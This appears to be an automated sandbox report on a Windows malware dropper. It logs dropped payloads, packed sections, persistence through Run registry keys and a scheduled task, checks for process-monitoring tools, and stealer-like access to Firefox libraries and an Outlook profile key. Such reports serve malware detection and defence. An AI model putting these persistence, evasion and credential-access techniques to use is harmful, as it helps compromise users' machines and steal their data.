Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: file.exe

Static file information: File size 2969600 > 1048576

Source: file.exe

Static PE information: Raw size of bkcrtoce is bigger than: 0x100000 < 0x2a3600

Source:	Binary string: mozglue.pdbP source: acdee533dd.exe, 0000001A.00000002.3110841430.000000006BE0D000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: nss3.pdb@ source: acdee533dd.exe, 0000001A.00000002.3112440122.000000006BFCF000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: nss3.pdb source: acdee533dd.exe, 0000001A.00000002.3112440122.000000006BFCF000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e2def46cb9.exe, 0000001F.00000002.2797872424.0000000000BE2000.00000040.00000001.01000000.00000016.sdmp, e2def46cb9.exe, 0000001F.00000003.2659680369.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: acdee533dd.exe, 0000001A.00000002.3110841430.000000006BE0D000.00000002.00000001.01000000.0000001A.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.ed0000.0.unpack :EW;.rsrc:W;.idata :W;bkcrtoce:EW;amhigela:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bkcrtoce:EW;amhigela:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W;bkcrtoce:EW;amhigela:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bkcrtoce:EW;amhigela:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Unpacked PE file: 26.2.acdee533dd.exe.800000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vknblbix:EW;fyoeglui:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vknblbix:EW;fyoeglui:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Unpacked PE file: 31.2.e2def46cb9.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W;titmuczc:EW;zslsucpn:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Unpacked PE file: 57.2.acdee533dd.exe.800000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vknblbix:EW;fyoeglui:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vknblbix:EW;fyoeglui:EW;.taggant:EW;

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

9_2_00FD42DE

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.5.dr	Static PE information: real checksum: 0x1cb710 should be: 0x1c09c7
Source: PK13K1G.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x710dc
Source: PK13K1G[1].exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x710dc
Source: random[1].exe2.5.dr	Static PE information: real checksum: 0x2b4dc6 should be: 0x2ae9c5
Source: e2def46cb9.exe.5.dr	Static PE information: real checksum: 0x2b4dc6 should be: 0x2ae9c5
Source: file.exe	Static PE information: real checksum: 0x2e3dad should be: 0x2dc491
Source: acdee533dd.exe.5.dr	Static PE information: real checksum: 0x1bf542 should be: 0x1bc67e
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2e3dad should be: 0x2dc491
Source: random[1].exe0.5.dr	Static PE information: real checksum: 0x2a0b8d should be: 0x2a49f1

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: bkcrtoce
Source: file.exe	Static PE information: section name: amhigela
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: bkcrtoce
Source: skotes.exe.0.dr	Static PE information: section name: amhigela
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: PK13K1G[1].exe.5.dr	Static PE information: section name: .OO
Source: PK13K1G.exe.5.dr	Static PE information: section name: .OO
Source: random[1].exe.5.dr	Static PE information: section name:
Source: random[1].exe.5.dr	Static PE information: section name: .idata
Source: random[1].exe.5.dr	Static PE information: section name:
Source: random[1].exe.5.dr	Static PE information: section name: vdtghsqu
Source: random[1].exe.5.dr	Static PE information: section name: cyxsntsn
Source: random[1].exe.5.dr	Static PE information: section name: .taggant
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name: .idata
Source: random[1].exe0.5.dr	Static PE information: section name: yfueqkee
Source: random[1].exe0.5.dr	Static PE information: section name: ympaktlu
Source: random[1].exe0.5.dr	Static PE information: section name: .taggant
Source: acdee533dd.exe.5.dr	Static PE information: section name:
Source: acdee533dd.exe.5.dr	Static PE information: section name: .idata
Source: acdee533dd.exe.5.dr	Static PE information: section name:
Source: acdee533dd.exe.5.dr	Static PE information: section name: vknblbix
Source: acdee533dd.exe.5.dr	Static PE information: section name: fyoeglui
Source: acdee533dd.exe.5.dr	Static PE information: section name: .taggant
Source: random[1].exe2.5.dr	Static PE information: section name:
Source: random[1].exe2.5.dr	Static PE information: section name: .idata
Source: random[1].exe2.5.dr	Static PE information: section name: titmuczc
Source: random[1].exe2.5.dr	Static PE information: section name: zslsucpn
Source: random[1].exe2.5.dr	Static PE information: section name: .taggant
Source: e2def46cb9.exe.5.dr	Static PE information: section name:
Source: e2def46cb9.exe.5.dr	Static PE information: section name: .idata
Source: e2def46cb9.exe.5.dr	Static PE information: section name: titmuczc
Source: e2def46cb9.exe.5.dr	Static PE information: section name: zslsucpn
Source: e2def46cb9.exe.5.dr	Static PE information: section name: .taggant
Source: msvcp140.dll.26.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.26.dr	Static PE information: section name: .didat
Source: freebl3.dll.26.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.26.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.26.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.26.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EED91C push ecx; ret	0_2_00EED92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B6E push eax; mov dword ptr [esp], 7FE1BDA5h	0_2_00FE7BA3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B6E push 3BC8B3E8h; mov dword ptr [esp], ebp	0_2_00FE7C0F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B6E push ebx; mov dword ptr [esp], edi	0_2_00FE7CA3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B6E push edi; mov dword ptr [esp], 259C70C0h	0_2_00FE7CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B6E push eax; mov dword ptr [esp], ebx	0_2_00FE7CF3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B6E push eax; mov dword ptr [esp], 00000067h	0_2_00FE7CF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B6E push edi; mov dword ptr [esp], ecx	0_2_00FE7D0E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B6E push edx; mov dword ptr [esp], 7F5B183Dh	0_2_00FE7D82
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B6E push ecx; mov dword ptr [esp], esi	0_2_00FE7DF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE1359 push es; ret	0_2_00EE135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F3D91C push ecx; ret	1_2_00F3D92F
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_000246A3 push ecx; ret	6_2_000246B6
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_000246A3 push ecx; ret	8_2_000246B6
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00442A45 push ABE5A148h; retf	8_2_00442A72
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0043BA60 push eax; mov dword ptr [esp], 999897C6h	8_2_0043BA64
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004424F8 push eax; retf	8_2_004424F9
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004416B3 push 75C7CD33h; ret	8_2_004416B9
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF0A76 push ecx; ret	9_2_00FF0A89

Source: file.exe	Static PE information: section name: entropy: 7.972851971131473
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.972851971131473
Source: random[1].exe.5.dr	Static PE information: section name: vdtghsqu entropy: 7.9549846283323875
Source: random[1].exe0.5.dr	Static PE information: section name: entropy: 7.794226613675693
Source: acdee533dd.exe.5.dr	Static PE information: section name: vknblbix entropy: 7.953644865266406
Source: random[1].exe2.5.dr	Static PE information: section name: entropy: 7.765435077698913
Source: e2def46cb9.exe.5.dr	Static PE information: section name: entropy: 7.765435077698913

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015170001\fe1ffe1825.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1015169001\f0cbba1288.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PK13K1G[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8ed1a1ded0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run acdee533dd.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e2def46cb9.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Window searched: window name: Regmonclass

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8ed1a1ded0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8ed1a1ded0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run acdee533dd.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run acdee533dd.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e2def46cb9.exe	Jump to behavior
